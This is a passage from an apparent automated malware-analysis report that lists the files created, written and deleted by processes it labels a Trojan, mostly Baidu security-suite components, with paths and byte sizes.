%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\license.txt (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (0 bytes)

The process BaiduHips.exe:3260 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000005.sst (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\smr.dat (95096 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (1368 bytes)
%System%\drivers\BDDefense.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%WinDir%\Temp\Tar1B.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%WinDir%\Temp\Cab1A.tmp (56 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1724 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000005.sst (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (597 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%WinDir%\Temp\Tar1B.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\CURRENT (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch (0 bytes)
%WinDir%\Temp\Cab1A.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (0 bytes)

The process BaiduHips.exe:320 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (112 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (384 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (37839 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (7972 bytes)
%WinDir%\Temp\Tar15.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (8657 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (223 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%WinDir%\Temp\Cab14.tmp (56 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1728 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (816 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)

The Trojan deletes the following file(s):

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\CURRENT (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000001 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (0 bytes)
%WinDir%\Temp\Cab14.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\CURRENT (0 bytes)
%WinDir%\Temp\Tar15.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000001 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)

The process bddownloader.exe:3300 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys.tmp.bdl (11169 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dnw.xml.tmp.bdl (245 bytes)

The process bddownloader.exe:3792 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fe56763bd610dbf0db84b6cd8b10202a.bdt (71 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerConfig.dat.bdl (1261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fb32afe4ccd37a3dbc2f8507075652b6.bdt (71 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\host.dat (306 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (14 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerXMLScript.dat.bdl (158 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (580 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (5230 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerLuaScript.dat.bdl (4154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\p2pconfig.dat (64 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch10\hipsClient.xml.bdl (3394 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (8 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (0 bytes)

The process G1023_s_70904.exe:3576 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SWManager.rdb (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\CompatibilityChecker.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSysFixerPlugin.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDownload.dll (11496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerLuaScript.dat (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnTray.exe (66168 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDConfig.dll (3073 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcher.dll (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTips.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHips.exe (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\patch.7z (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNet.dll (60999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccEngine.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAcceleratorPlugin.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNestCore.dll (18424 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccCoolyPlugin.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftMgrCoolyPlugin.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\LocalPluginInfo.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerScript.dat (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurl.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceCleanerConfig.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDCooly.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NotInstalledPlugin.xml (428 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_appassext.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PreU.xml (643 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDArKit.sys (11688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerConfig.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDActiveDefensePlugin.dll (7192 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsIU.dll (63 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\ad.dll (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0001.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsCore.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccSusPlugin.dll (12536 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Unknownfile.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\scan_mgr_config.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVCached.dll (24416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_acc.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\homepage.ini (361 bytes)
%WinDir%\Fonts\baiduan_number_new.ttf (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginManager.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWDeskGuide.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\publish.db (185551 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\DriverManager.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBusiness.dll (1281 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVCommonRes.rdb (3616 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWUpdateTip.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GlobalPluginInfo.xml (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonSusPlugin.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (2013786 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDEnhanceBoost.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDPerflog.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAn.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnBugRpt.exe (23936 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\blacksign.dat (852 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceConfig.xml (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWDeepClean.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageConfig.xml (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVMainPlugin.dll (25776 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\baiduan_number_new.ttf (784 bytes)
%System%\config\SYSTEM.LOG (9441 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\NetService.ini (615 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDLogicUtils.dll (15656 bytes)
